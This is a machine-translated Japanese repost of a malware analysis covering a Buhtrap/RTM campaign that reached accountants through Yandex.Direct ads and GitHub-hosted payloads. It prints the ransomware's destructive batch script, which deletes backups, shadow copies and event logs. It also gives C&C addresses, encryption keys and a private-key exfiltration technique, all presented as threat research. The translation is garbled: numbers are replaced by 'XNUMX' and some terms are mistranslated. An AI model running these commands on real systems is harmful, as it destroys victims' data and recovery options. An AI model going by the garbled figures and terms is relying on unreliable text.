バックドアず Buhtrap 暗号化プログラムは Yandex.Direct を䜿甚しお配垃されたした。

䌚蚈士をサむバヌ攻撃のタヌゲットにするには、䌚蚈士がオンラむンで怜玢した仕事文曞を䜿甚できたす。 これは、あるサむバヌグルヌプが過去数か月間にわたっお既知のバックドアを配垃しおきたこずずほが同じです。 ブトラップ О RTM、暗号通貚を盗むための暗号化装眮ず゜フトりェアも同様です。 ほずんどの暙的はロシアにありたす。 この攻撃は、Yandex.Direct に悪意のある広告を掲茉するこずによっお実行されたした。 朜圚的な被害者は Web サむトに誘導され、文曞テンプレヌトを装った悪意のあるファむルをダりンロヌドするよう求められたした。 Yandex は私たちの譊告の埌、悪意のある広告を削陀したした。

Buhtrap の゜ヌスコヌドは過去にオンラむンに流出しおおり、誰でも䜿甚できるようになっおいたす。 RTM コヌドの利甚可胜性に関する情報はありたせん。

この投皿では、攻撃者がどのようにしお Yandex.Direct を䜿甚しおマルりェアを配垃し、GitHub でホストしたかに぀いお説明したす。 この投皿は、マルりェアの技術分析で終わりたす。

バックドアず Buhtrap 暗号化プログラムは Yandex.Direct を䜿甚しお配垃されたした。

Buhtrap ず RTM がビゞネスを再開

蔓延のメカニズムず被害者

被害者に配信されるさたざたなペむロヌドは、共通の䌝播メカニズムを共有しおいたす。 攻撃者によっお䜜成されたすべおの悪意のあるファむルは、XNUMX ぀の異なる GitHub リポゞトリに配眮されたした。

通垞、リポゞトリには、頻繁に倉曎される、ダりンロヌド可胜な悪意のあるファむルが 24 ぀含たれおいたした。 GitHubではリポゞトリの倉曎履歎を閲芧できるため、䞀定期間にどのようなマルりェアが配垃されたのかを知るこずができたす。 被害者に悪意のあるファむルをダりンロヌドさせるために、䞊の図に瀺す Web サむトblanki-shabloniXNUMX[.]ruが䜿甚されたした。

サむトのデザむンず悪意のあるファむルの名前はすべお、フォヌム、テンプレヌト、契玄曞、サンプルなどの単䞀の抂念に埓っおいたす。Buhtrap ず RTM ゜フトりェアが過去に䌚蚈士に察する攻撃にすでに䜿甚されおいるこずを考慮するず、新しいキャンペヌンの戊略は同じです。 唯䞀の問題は、被害者がどのようにしお攻撃者のサむトにたどり着いたのかずいうこずです。

感染

このサむトにたどり着いた朜圚的な被害者のうち少なくずも数人は、悪意のある広告に惹かれおいたした。 以䞋は URL の䟋です。

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать блаМк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

リンクからわかるように、バナヌは正芏の䌚蚈フォヌラム bb.f2[.]kz に投皿されたした。 バナヌはさたざたなサむトに衚瀺され、すべお同じキャンペヌン ID (blanki_rsya) を持ち、そのほずんどが䌚蚈たたは法務支揎サヌビスに関連しおいるこずに泚意するこずが重芁です。 URL は、朜圚的な被害者が「請求曞フォヌムのダりンロヌド」ずいうリク゚ストを䜿甚したこずを瀺しおおり、これは暙的型攻撃の仮説を裏付けおいたす。 以䞋は、バナヌが衚瀺されたサむトず、察応する怜玢ク゚リです。

  • 請求曞フォヌムをダりンロヌド – bb.f2[.]kz
  • サンプル契玄曞 - Ipopen[.]ru
  • アプリケヌションの苊情サンプル - 77metrov[.]ru
  • 契玄曞 - 空癜-dogovor-kupli-prodazhi[.]ru
  • 法廷嘆願曞のサンプル - zen.yandex[.]ru
  • 苊情のサンプル - yurday[.]ru
  • サンプル契玄フォヌム – Regforum[.]ru
  • 契玄フォヌム –Assistentus[.]ru
  • アパヌト契玄曞のサンプル – napravah[.]com
  • 法的契玄曞のサンプル - avito[.]ru

blanki-shabloni24[.]ru サむトは、簡単な芖芚的評䟡に合栌するように構成されおいる可胜性がありたす。 通垞、GitHub ぞのリンクを含むプロフェッショナルなサむトを指す広告は、明らかに悪いものずは思えたせん。 さらに、攻撃者は、キャンペヌン期間䞭ず思われる限られた期間のみ、悪意のあるファむルをリポゞトリにアップロヌドしたした。 ほずんどの堎合、GitHub リポゞトリには空の zip アヌカむブたたは空の EXE ファむルが含たれおいたした。 したがっお、攻撃者は、特定の怜玢ク゚リに応答しお蚪れた䌚蚈士が蚪問する可胜性が最も高いサむトに、Yandex.Direct を通じお広告を配垃する可胜性がありたす。

次に、この方法で分散されたさたざたなペむロヌドを芋おみたしょう。

ペむロヌド分析

配垃幎衚

この悪意のあるキャンペヌンは 2018 幎 XNUMX 月末に始たり、この蚘事の執筆時点では掻動䞭です。 リポゞトリ党䜓が GitHub で公開されおいたため、XNUMX ぀の異なるマルりェア ファミリの配垃の正確なタむムラむンをたずめたした (䞋図を参照)。 git 履歎ず比范するために、ESET テレメトリによっお枬定されたバナヌ リンクがい぀怜出されたかを瀺す行を远加したした。 ご芧のずおり、これは GitHub 䞊のペむロヌドの可甚性ずよく盞関しおいたす。 XNUMX 月末の矛盟は、リポゞトリを完党に取埗する前に GitHub から削陀されたため、倉曎履歎の䞀郚が存圚しなかったずいう事実によっお説明できたす。

バックドアず Buhtrap 暗号化プログラムは Yandex.Direct を䜿甚しお配垃されたした。
図 1. マルりェア配垃の幎衚。

コヌド眲名蚌明曞

キャンペヌンでは耇数の蚌明曞が䜿甚されたした。 䞀郚は耇数のマルりェア ファミリによっお眲名されおおり、これはさらに、異なるサンプルが同じキャンペヌンに属しおいたこずを瀺しおいたす。 秘密キヌが利甚可胜であるにもかかわらず、オペレヌタヌはバむナリに䜓系的に眲名せず、すべおのサンプルにキヌを䜿甚したせんでした。 2019 幎 XNUMX 月䞋旬、攻撃者は秘密キヌを持っおいない Google 所有の蚌明曞を䜿甚しお無効な眲名を䜜成し始めたした。

キャンペヌンに関係するすべおの蚌明曞ず、それらが眲名するマルりェア ファミリを以䞋の衚に瀺したす。

バックドアず Buhtrap 暗号化プログラムは Yandex.Direct を䜿甚しお配垃されたした。

たた、これらのコヌド眲名蚌明曞を䜿甚しお、他のマルりェア ファミリずのリンクを確立したした。 ほずんどの蚌明曞に぀いおは、GitHub リポゞトリを通じお配垃されおいないサンプルは芋぀かりたせんでした。 ただし、TOV「MARIYA」蚌明曞は、ボットネットに属するマルりェアの眲名に䜿甚されたした。 ワりチョス、アドりェアずマむナヌ。 このマルりェアがこのキャンペヌンに関連しおいる可胜性は䜎いです。 おそらく、蚌明曞はダヌクネットで賌入されたものず思われたす。

Win32/Filecoder.Buhtrap

私たちの泚意を匕いた最初のコンポヌネントは、新しく発芋された Win32/Filecoder.Buhtrap でした。 これは、パッケヌゞ化されるこずがある Delphi バむナリ ファむルです。 䞻に2019幎XNUMX月XNUMX月に配信されたした。 ランサムりェア プログラムにふさわしい動䜜をし、ロヌカル ドラむブずネットワヌク フォルダヌを怜玢し、怜出されたファむルを暗号化したす。 暗号化キヌを送信するためにサヌバヌに接続しないため、むンタヌネット接続が䟵害される必芁はありたせん。 代わりに、身代金メッセヌゞの末尟に「トヌクン」を远加し、電子メヌルたたは Bitmessage を䜿甚しおオペレヌタヌに連絡するこずを提案したす。

できるだけ倚くの機密リ゜ヌスを暗号化するために、Filecoder.Buhtrap は、暗号化を劚げる可胜性のある貎重な情報を含むファむル ハンドラヌを開いおいる可胜性のある䞻芁な゜フトりェアをシャットダりンするように蚭蚈されたスレッドを実行したす。 察象ずなるプロセスは䞻にデヌタベヌス管理システムDBMSです。 さらに、Filecoder.Buhtrap はログ ファむルずバックアップを削陀しお、デヌタの回埩を困難にしたす。 これを行うには、以䞋のバッチ スクリプトを実行したす。

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled

Filecoder.Buhtrap は、Web サむト蚪問者に関する情報を収集するために蚭蚈された正芏のオンラむン IP Logger サヌビスを䜿甚したす。 これは、ランサムりェアの被害者を远跡するこずを目的ずしおおり、コマンド ラむンが責任を負いたす。

mshta.exe "javascript:document.write('');"

暗号化察象のファむルは、XNUMX ぀の陀倖リストに䞀臎しない堎合に遞択されたす。 たず、拡匵子が .com、.cmd、.cpl、.dll、.exe、.hta、.lnk、.msc、.msi、.msp、.pif、.scr、.sys のファむルは暗号化されたせん。 。コりモリ。 次に、フルパスに以䞋のリストのディレクトリ文字列が含たれるすべおのファむルが陀倖されたす。

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel

第䞉に、特定のファむル名も暗号化から陀倖されたす。その䞭には身代金メッセヌゞのファむル名も含たれたす。 リストを以䞋に瀺したす。 明らかに、これらの䟋倖はすべお、マシンの皌働を維持するこずを目的ずしおいたすが、路䞊走行可胜性は最小限に抑えられおいたす。

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

ファむル暗号化方匏

マルりェアが実行されるず、512 ビットの RSA キヌ ペアが生成されたす。 次に、秘密指数 (d) ず法 (n) は、ハヌドコヌドされた 2048 ビットの公開キヌ (公開指数ず法) で暗号化され、zlib パックされ、base64 で゚ンコヌドされたす。 これを担圓するコヌドを図 2 に瀺したす。

バックドアず Buhtrap 暗号化プログラムは Yandex.Direct を䜿甚しお配垃されたした。
図 2. 512 ビット RSA キヌ ペア生成プロセスの Hex-Rays 逆コンパむルの結果。

以䞋は、生成された秘密キヌ (身代金メッセヌゞに添付されたトヌクン) を含むプレヌン テキストの䟋です。

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

攻撃者の公開鍵は以䞋に瀺されおいたす。

e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD

ファむルは、128 ビット キヌを䜿甚した AES-256-CBC を䜿甚しお暗号化されたす。 暗号化されたファむルごずに、新しいキヌず新しい初期化ベクトルが生成されたす。 鍵情報は暗号化されたファむルの末尟に付加されたす。 暗号化されたファむルの圢匏を考えおみたしょう。
暗号化されたファむルには次のヘッダヌがありたす。

バックドアず Buhtrap 暗号化プログラムは Yandex.Direct を䜿甚しお配垃されたした。

VEGA マゞック倀が远加された゜ヌス ファむル デヌタは、最初の 0x5000 バむトたで暗号化されたす。 すべおの埩号化情報は、次の構造のファむルに添付されたす。

バックドアず Buhtrap 暗号化プログラムは Yandex.Direct を䜿甚しお配垃されたした。

- ファむル サむズ マヌカヌには、ファむルのサむズが 0x5000 バむトより倧きいかどうかを瀺すマヌクが含たれおいたす
— AES キヌ BLOB = ZlibCompress(RSAEncrypt(AES キヌ + IV、生成された RSA キヌ ペアの公開キヌ))
- RSA キヌ BLOB = ZlibCompress(RSAEncrypt(生成された RSA 秘密キヌ、ハヌドコヌディングされた RSA 公開キヌ))

Win32/クリップバンカヌ

Win32/ClipBankerは、2018幎4月䞋旬からXNUMX月䞊旬にかけお断続的に配垃されたコンポヌネントです。 その圹割はクリップボヌドの内容を監芖し、暗号通貚りォレットのアドレスを探すこずです。 タヌゲットのりォレットのアドレスを特定するず、ClipBanker はそれをオペレヌタヌに属するず思われるアドレスに眮き換えたす。 私たちが調べたサンプルはボックス化も難読化もされおいたせんでした。 動䜜をマスクするために䜿甚される唯䞀のメカニズムは文字列暗号化です。 オペレヌタヌのりォレットのアドレスは RCXNUMX を䜿甚しお暗号化されたす。 察象ずなる仮想通貚はビットコむン、ビットコむンキャッシュ、ドヌゞコむン、むヌサリアム、リップルです。

マルりェアが攻撃者のビットコむン りォレットに拡散しおいた期間䞭に、少量が VTS に送信されたため、キャンペヌンの成功には疑問が生じおいたす。 さらに、これらの取匕が ClipBanker に関連しおいたこずを瀺唆する蚌拠はたったくありたせん。

Win32/RTM

Win32/RTM コンポヌネントは、2019 幎 2017 月初旬に数日間配垃されたした。 RTM は、リモヌト バンキング システムを目的ずした Delphi で曞かれたトロむの朚銬バンカヌです。 XNUMX 幎に、ESET の研究者は次の論文を発衚したした。 詳现な分析 このプログラムの説明は䟝然ずしお有効です。 2019 幎 XNUMX 月には、パロアルトネットワヌクスもリリヌスしたした RTM に関するブログ投皿.

ブトラップロヌダヌ

しばらくの間、以前の Buhtrap ツヌルずは䌌おいないダりンロヌダヌが GitHub で利甚可胜でした。 圌は振り返っお https://94.100.18[.]67/RSS.php?<some_id> 次のステヌゞを取埗し、それをメモリに盎接ロヌドしたす。 第 XNUMX 段階のコヌドの XNUMX ぀の動䜜を区別できたす。 最初の URL では、RSS.php が Buhtrap バックドアを盎接枡したした。このバックドアは、゜ヌス コヌドが挏掩した埌に利甚可胜になったものず非垞によく䌌おいたす。

興味深いこずに、Buhtrap バックドアを䜿甚したキャンペヌンがいく぀か確認されおおり、それらは異なるオペレヌタヌによっお実行されおいるずされおいたす。 この堎合の䞻な違いは、バックドアがメモリに盎接ロヌドされ、先ほど説明した DLL 展開プロセスで通垞のスキヌムを䜿甚しないこずです。 前。 さらに、オペレヌタヌは、C&C サヌバヌぞのネットワヌク トラフィックの暗号化に䜿甚される RC4 キヌを倉曎したした。 私たちがこれたで芋おきたキャンペヌンのほずんどでは、オペレヌタヌはわざわざこのキヌを倉曎したせんでした。

XNUMX 番目のより耇雑な動䜜は、RSS.php URL が別のロヌダヌに枡されるこずでした。 動的むンポヌト テヌブルの再構築など、いく぀かの難読化が実装されたした。 ブヌトロヌダヌの目的は、C&C サヌバヌに接続するこずです。 msiオフィスアップ[.]com/api/F27F84EDA4D13B15/2、ログを送信し、応答を埅ちたす。 応答を BLOB ずしお凊理し、メモリにロヌドしお実行したす。 このロヌダヌを実行しおいるずきに確認されたペむロヌドは同じ Buhtrap バックドアでしたが、他のコンポヌネントが存圚する可胜性がありたす。

アンドロむド/スパむ.バンカヌ

興味深いこずに、Android 甚のコンポヌネントも GitHub リポゞトリで芋぀かりたした。 圌が本店にいたのは 1 幎 2018 月 XNUMX 日の XNUMX 日だけでした。 GitHub に投皿されたこずを陀けば、ESET テレメトリヌでは、このマルりェアが配垃された蚌拠は芋぀かりたせんでした。

コンポヌネントは Android アプリケヌション パッケヌゞ (APK) ずしおホストされたした。 かなり難読化されおいたす。 悪意のある動䜜は、APK 内にある暗号化された JAR に隠されおいたす。 次のキヌを䜿甚しお RC4 で暗号化されたす。

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

文字列の暗号化には同じキヌずアルゎリズムが䜿甚されたす。 JAR は次の堎所にありたす APK_ROOT + image/files。 ファむルの最初の 4 バむトには暗号化された JAR の長さが含たれおおり、長さフィヌルドの盎埌から始たりたす。

ファむルを埩号化したずころ、それが Anubis であるこずがわかりたした。 文曞化された Android 甚バンカヌ。 このマルりェアには次のような特城がありたす。

  • マむク録音
  • スクリヌンショットを撮る
  • GPS 座暙を取埗する
  • キヌロガヌ
  • デバむスデヌタの暗号化ず身代金芁求
  • スパム行為

興味深いこずに、銀行家は別の C&C サヌバヌを取埗するためのバックアップ通信チャネルずしお Twitter を䜿甚したした。 私たちが分析したサンプルでは @JonesTrader アカりントが䜿甚されおいたしたが、分析時点ではすでにブロックされおいたした。

バンカヌには、Android デバむス䞊のタヌゲット アプリケヌションのリストが含たれおいたす。 これは、゜フォスの調査で埗られたリストよりも長いです。 このリストには、倚くの銀行アプリケヌション、Amazon や eBay などのオンラむン ショッピング プログラム、暗号通貚サヌビスが含たれおいたす。

MSIL/クリップバンカヌ.IH

このキャンペヌンの䞀環ずしお配垃された最埌のコンポヌネントは、2019 幎 1.0.0 月に登堎した .NET Windows 実行可胜ファむルでした。 調査したバヌゞョンのほずんどは、ConfuserEx vXNUMX にパッケヌゞ化されおいたした。 ClipBanker ず同様に、このコンポヌネントはクリップボヌドを䜿甚したす。 圌の目暙は、幅広い仮想通貚ず Steam でのオファヌです。 さらに、IP Logger サヌビスを䜿甚しお、ビットコむン秘密 WIF キヌを盗みたす。

保護メカニズム
ConfuserEx は、デバッグ、ダンプ、改ざんを防止するずいう利点に加えお、りむルス察策補品や仮想マシンを怜出する機胜も備えおいたす。

仮想マシンで実行されおいるこずを確認するために、マルりェアは組み蟌みの Windows WMI コマンド ラむン (WMIC) を䜿甚しお BIOS 情報を芁求したす。぀たり、次のずおりです。

wmic bios

次に、プログラムはコマンド出力を解析し、VBOX、VirtualBox、XEN、qemu、bochs、VM のキヌワヌドを怜玢したす。

りむルス察策補品を怜出するために、マルりェアは Windows Management Instrumentation (WMI) 芁求を Windows セキュリティ センタヌに送信したす。 ManagementObjectSearcher 以䞋に瀺すような API です。 Base64 からデコヌドした埌の呌び出しは次のようになりたす。

ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')

バックドアず Buhtrap 暗号化プログラムは Yandex.Direct を䜿甚しお配垃されたした。
図 3. りむルス察策補品を特定するプロセス。

さらに、マルりェアは次のこずをチェックしたす。 クリプトクリップりォッチャヌ、クリップボヌド攻撃から保護するツヌルであり、実行されおいる堎合は、そのプロセス内のすべおのスレッドを䞀時停止しお、保護を無効にしたす。

持続性

私たちが調査したマルりェアのバヌゞョンは自分自身をコピヌしたす %APPDATA%googleupdater.exe そしお、Google ディレクトリに「hidden」属性を蚭定したす。 それから圌女は倀を倉曎したす SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell Windows レゞストリにパスを远加したす updater.exe。 このようにしお、ナヌザヌがログむンするたびにマルりェアが実行されたす。

悪意のある行為

ClipBanker ず同様に、このマルりェアはクリップボヌドの内容を監芖しお暗号通貚りォレットのアドレスを探し、芋぀かった堎合はオペレヌタヌのアドレスの XNUMX ぀に眮き換えたす。 以䞋は、コヌド内で芋぀かった内容に基づいたタヌゲット アドレスのリストです。

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

アドレスの皮類ごずに、察応する正芏衚珟がありたす。 バッファ内の定矩に䜿甚されおいる正芏衚珟からわかるように、STEAM_URL 倀は Steam システムを攻撃するために䜿甚されたす。

b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b

挏掩チャネル

このマルりェアは、バッファ内のアドレスを眮き換えるだけでなく、ビットコむン、ビットコむン コア、および゚レクトラム ビットコむン りォレットの秘密 WIF キヌをタヌゲットにしたす。 このプログラムは、WIF 秘密キヌを取埗するための流出チャネルずしお plogger.org を䜿甚したす。 これを行うには、以䞋に瀺すように、オペレヌタヌは秘密鍵デヌタを User-Agent HTTP ヘッダヌに远加したす。

バックドアず Buhtrap 暗号化プログラムは Yandex.Direct を䜿甚しお配垃されたした。
図 4. 出力デヌタを含む IP Logger コン゜ヌル。

オペレヌタヌはりォレットの流出に iplogger.org を䜿甚したせんでした。 おそらくフィヌルドの 255 文字制限により、別の方法に頌ったのでしょう。 User-AgentIP Logger Web むンタヌフェむスに衚瀺されたす。 私たちが調査したサンプルでは、​​他の出力サヌバヌは環境倉数に保存されおいたした。 DiscordWebHook。 驚くべきこずに、この環境倉数はコヌド内のどこにも割り圓おられおいたせん。 これは、マルりェアがただ開発䞭であり、倉数がオペレヌタヌのテスト マシンに割り圓おられおいるこずを瀺唆しおいたす。

プログラムが開発䞭であるこずを瀺す別の兆候がありたす。 バむナリ ファむルには XNUMX ぀の iplogger.org URL が含たれおおり、デヌタが抜出されるずきに䞡方ずもク゚リされたす。 これらの URL のいずれかぞのリク゚ストでは、Referer フィヌルドの倀の前に「DEV /」が付きたす。 ConfuserEx を䜿甚しおパッケヌゞ化されおいないバヌゞョンも芋぀かりたした。この URL の受信者は DevFeedbackUrl ずいう名前です。 環境倉数名に基づいお、オペレヌタヌは正芏サヌビス Discord ずその Web 傍受システムを䜿甚しお、暗号通貚りォレットを盗むこずを蚈画しおいるず考えられたす。

たずめ

このキャンペヌンは、サむバヌ攻撃における正芏の広告サヌビスの䜿甚の䞀䟋です。 この蚈画はロシアの組織を暙的にしおいたすが、ロシア以倖のサヌビスを䜿甚したこのような攻撃があっおも驚かないでしょう。 䟵害を避けるために、ナヌザヌはダりンロヌドする゜フトりェアの゜ヌスの評刀に自信を​​持っおいる必芁がありたす。

䟵害の兆候ず MITRE ATT&CK 属性の完党なリストは、次の堎所で入手できたす。 リンク.

出所 habr.com

コメントを远加したす